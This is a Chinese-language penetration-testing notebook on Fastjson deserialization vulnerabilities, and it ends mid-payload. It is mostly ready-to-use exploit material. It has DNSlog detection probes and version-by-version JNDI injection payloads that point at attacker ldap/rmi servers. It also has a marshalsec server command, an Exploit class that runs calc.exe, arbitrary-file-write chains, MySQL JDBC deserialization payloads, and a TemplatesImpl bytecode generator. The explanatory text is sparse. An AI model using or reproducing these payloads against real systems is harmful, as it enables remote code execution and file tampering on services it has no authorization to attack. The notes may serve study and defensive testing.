复现
测试版本1.2.47
dnslog判断
{"@type":"java.net.Inet4Address", "val":"dnslog"}
{"@type":"java.net.Inet6Address", "val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":, "val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL", "val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL", "val":"dnslog"}]
Set[{"@type":"java.net.URL", "val":"dnslog"}
{{"@type":"java.net.URL", "val":"dnslog"}:0
[{"a":"a\x] dos漏洞
{"a":"
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{{"@type":"java.net.URL","val":"dnslog"}:0
{{"@type":"java.net.URL","val":"http://%s"}:"x"}
<1.2.67
{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}
>1.2.67
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.lang.AutoCloseable"
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://quw3hz.dnslog.cn",
"autoCommit":true
}
}
JdbcRowSetImpl
python3 -m http.server
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE" 1389
Exploit.java
public class Exploit {
public Exploit(){
try{
Runtime.getRuntime().exec(new String[]{"calc.exe"});
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}
payload
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://127.0.0.1:1389/Calc",
"autoCommit": true
}
}
java高版本绕过
参考:
https://www.penson.top/article/av29#toc-heading-4
payload集合:
影响版本:
fastjson<=1.2.24
exp:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}
影响版本:
fastjson<=1.2.41
前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
exp:
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}
影响版本:
fastjson<=1.2.42
前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
exp:
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
影响版本:
fastjson<=1.2.43
前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
exp:
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
影响版本:
fastjson<=1.2.45
前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
exp:
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}
影响版本:
fastjson<=1.2.47
exp:
{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x.x.x.x:1999/Exploit", "autoCommit": true }}
影响版本:
fastjson<=1.2.62
exp:
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"
影响版本:
fastjson<=1.2.66
前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
exp:
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}
fastjson<=1.2.68 任意文件写入
{ "x":{ "@type":"java.lang.AutoCloseable", "@type":"sun.rmi.server.MarshalOutputStream", "out":{ "@type":"java.util.zip.InflaterOutputStream", "out":{ "@type":"java.io.FileOutputStream", "file":"/tmp/dest.txt", "append":false }, "infl":{ "input":"eJwL8nUyNDJSyCxWyEgtSgUAHKUENw==" }, "bufLen":1048576 }, "protocolVersion":1 }}{"x":{"@type":"java.lang.AutoCloseable","@type":"sun.rmi.server.MarshalOutputStream","out":{"@type":"java.util.zip.InflaterOutputStream","out":{"@type":"java.io.FileOutputStream","file":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/charsets.jar","append":false},"infl":{"input":"xxx"},"bufLen":1048576},"protocolVersion":1}}{"x":{"@type":"java.nio.charset.Charset","val":"500"}}
这个利用链仅仅存在centos中,范围还是苛刻的,我在win下测试的时候一直报错,一番搜索最终找到了原因
fastjson 在通过带参构造函数进行反序列化时,会检查参数是否有参数名,只有含有参数名的带参构造函数才会被认可
而sun.rmi.server.MarshalOutputStream在win下是没有的
commons-io任意文件写入
ReaderInputStream + CharSequenceReader 创建输入流
WriterOutputStream + FileWriterWithEncoding创建输出流
{ "x":{ "@type":"com.alibaba.fastjson.JSONObject", "input":{ "@type":"java.lang.AutoCloseable", "@type":"org.apache.commons.io.input.ReaderInputStream", "reader":{ "@type":"org.apache.commons.io.input.CharSequenceReader", "charSequence":{"@type":"java.lang.String""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaapenson" }, "charsetName":"UTF-8", "bufferSize":1024 }, "branch":{ "@type":"java.lang.AutoCloseable", "@type":"org.apache.commons.io.output.WriterOutputStream", "writer":{ "@type":"org.apache.commons.io.output.FileWriterWithEncoding", "file":"./1.txt", "encoding":"UTF-8", "append": false }, "charsetName":"UTF-8", "bufferSize": 1024, "writeImmediately": true }, "trigger":{ "@type":"java.lang.AutoCloseable", "@type":"org.apache.commons.io.input.XmlStreamReader", "is":{ "@type":"org.apache.commons.io.input.TeeInputStream", "input":{ "$ref":"$.input" }, "branch":{ "$ref":"$.branch" }, "closeBranch": true }, "httpContentType":"text/xml", "lenient":false, "defaultEncoding":"UTF-8" }, "trigger2":{ "@type":"java.lang.AutoCloseable", "@type":"org.apache.commons.io.input.XmlStreamReader", "is":{ "@type":"org.apache.commons.io.input.TeeInputStream", "input":{ "$ref":"$.input" }, "branch":{ "$ref":"$.branch" }, "closeBranch": true }, "httpContentType":"text/xml", "lenient":false, "defaultEncoding":"UTF-8" }, "trigger3":{ "@type":"java.lang.AutoCloseable", "@type":"org.apache.commons.io.input.XmlStreamReader", "is":{ "@type":"org.apache.commons.io.input.TeeInputStream", "input":{ "$ref":"$.input" }, "branch":{ "$ref":"$.branch" }, "closeBranch": true }, "httpContentType":"text/xml", "lenient":false, "defaultEncoding":"UTF-8" } }}
XmlStreamReader::InputStream is TeeInputStream::InputStream input && TeeInputStream::OutputStream branch writerOutputStream && readerInputStream
import org.apache.commons.io.input.CharSequenceReader;import org.apache.commons.io.input.ReaderInputStream;import org.apache.commons.io.input.TeeInputStream;import org.apache.commons.io.input.XmlStreamReader;import org.apache.commons.io.output.FileWriterWithEncoding;import org.apache.commons.io.output.WriterOutputStream;public class Test { public static void main(String[] args) throws Exception { String test="asd"; CharSequenceReader charSequenceReader = new CharSequenceReader(test); ReaderInputStream readerInputStream = new ReaderInputStream(charSequenceReader,"UTF-8",1024); FileWriterWithEncoding fileWriterWithEncoding = new FileWriterWithEncoding("1.txt","UTF-8"); WriterOutputStream writerOutputStream = new WriterOutputStream(fileWriterWithEncoding,"UTF-8",1024,true); TeeInputStream teeInputStream = new TeeInputStream(readerInputStream,writerOutputStream); XmlStreamReader xmlStreamReader = new XmlStreamReader(teeInputStream); }}
缺点:只写入前8192个字符
需要依赖
<dependency> <groupId>commons-io</groupId> <artifactId>commons-io</artifactId> <version>2.5</version> </dependency>
具体分析长亭那篇已经很详细,这里只做总结
参考:
https://www.cnblogs.com/zpchcbd/p/14969606.html
https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg
fastjson <=1.2.68 jdbc 反序列化
<dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>5.1.12</version> </dependency> { "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "127.0.0.1", "portToConnectTo": 3306, "info": { "user": "CommonsCollections2", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" }, "databaseToConnectTo": "dbname", "url": "" } }
CommonsCollection2 为要利用的cc链
<dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>6.0.2</version> </dependency> { "name": { "@type":"java.lang.AutoCloseable", "@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection", "proxy": { "connectionString":{ "url":"jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&useSSL=false&user=yso_CommonsCollections2_calc" } } }}
https://github.com/fnmsd/MySQL_Fake_Server
需要恶意mysql服务器,前辈已经写好了
参考:
https://www.cnblogs.com/pickmea/p/15157189.html
fastjson 1.2.68
{"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"172.20.64.40","portToConnectTo":3306,"url":"jdbc:mysql://172.20.64.40:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","databaseToConnectTo":"test","info":{"@type":"java.util.Properties","PORT":"3306","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","user":"yso_URLDNS_http://ahfladhjfd.6fehoy.dnslog.cn","PORT.1":"3306","HOST.1":"172.20.64.40","NUM_HOSTS":"1","HOST":"172.20.64.40","DBNAME":"test"}}
不出网解决
利用方式:
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
TemplatesImpl的POC构造比JdbcRowSetImpl复杂些,而且对反序列化的SerializerFeature
参数有要求,使用parseObject
时需要JSON.parseObject(json, Object.class, Feature.SupportNonPublicField)
,parse
方法时需要JSON.parse(json,Feature.SupportNonPublicField)
,但好处就是无需出网加载恶意类。
其实就是魔改yso的cc链,但是这个利用条件还是挺苛刻的,需要有Feature
package com.fastjson;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.Feature;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import javassist.CannotCompileException;import javassist.ClassPool;import javassist.CtClass;import javassist.CtNewConstructor;import org.apache.tomcat.util.codec.binary.Base64;public class TemplatesImpl { public static CtClass makeClass() throws CannotCompileException { ClassPool classPool = ClassPool.getDefault(); CtClass clazz = classPool.makeClass("com.summersec.x.Test" + System.nanoTime()); clazz.addConstructor(CtNewConstructor.make("public Test(){ Runtime.getRuntime().exec(\"calc.exe\");}",clazz)); return clazz; } public static void main(String args[]) throws Exception { ClassPool aDefault = ClassPool.getDefault(); CtClass ctClass = makeClass(); ctClass.setSuperclass((aDefault.get(AbstractTranslet.class.getName()))); byte[] evilCode = ctClass.toBytecode(); String encode = Base64.encodeBase64String(evilCode); String json = "{" + " \"a\": {" + " \"@type\": \"java.lang.Class\"," + " \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"" + " }," + " \"b\": {" + " \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," + " \"_bytecodes\": [\""+encode+"\"]," + " '_name': 'a.b'," + " '_tfactory': {}," + " \"_outputProperties\": {}," + " \"_name\": \"b\"," + " \"_version\": \"1.0\"," + " \"allowedProtocols\": \"all\"" + " }" + "}"; System.out.println(json); JSON.parseObject(json, Object.class, Feature.SupportNonPublicField); }}
payload:
{ "a": { "@type": "java.lang.Class", "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" }, "b": { "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", "_bytecodes": ["yv66vgAAADQAGwEAIWNvbS9zdW1tZXJzZWMveC9UZXN0NDUxODM4NTQyOTIwMAcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQAWVGVzdDQ1MTgzODU0MjkyMDAuamF2YQEABjxpbml0PgEAAygpVgwABwAICgAEAAkBABFqYXZhL2xhbmcvUnVudGltZQcACwEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAA0ADgoADAAPAQAIY2FsYy5leGUIABEBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAATABQKAAwAFQEABENvZGUBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwAYCgAZAAkAIQACABkAAAAAAAEAAQAHAAgAAQAXAAAAGgACAAEAAAAOKrcAGrgAEBIStgAWV7EAAAAAAAEABQAAAAIABg=="], '_name': 'a.b', 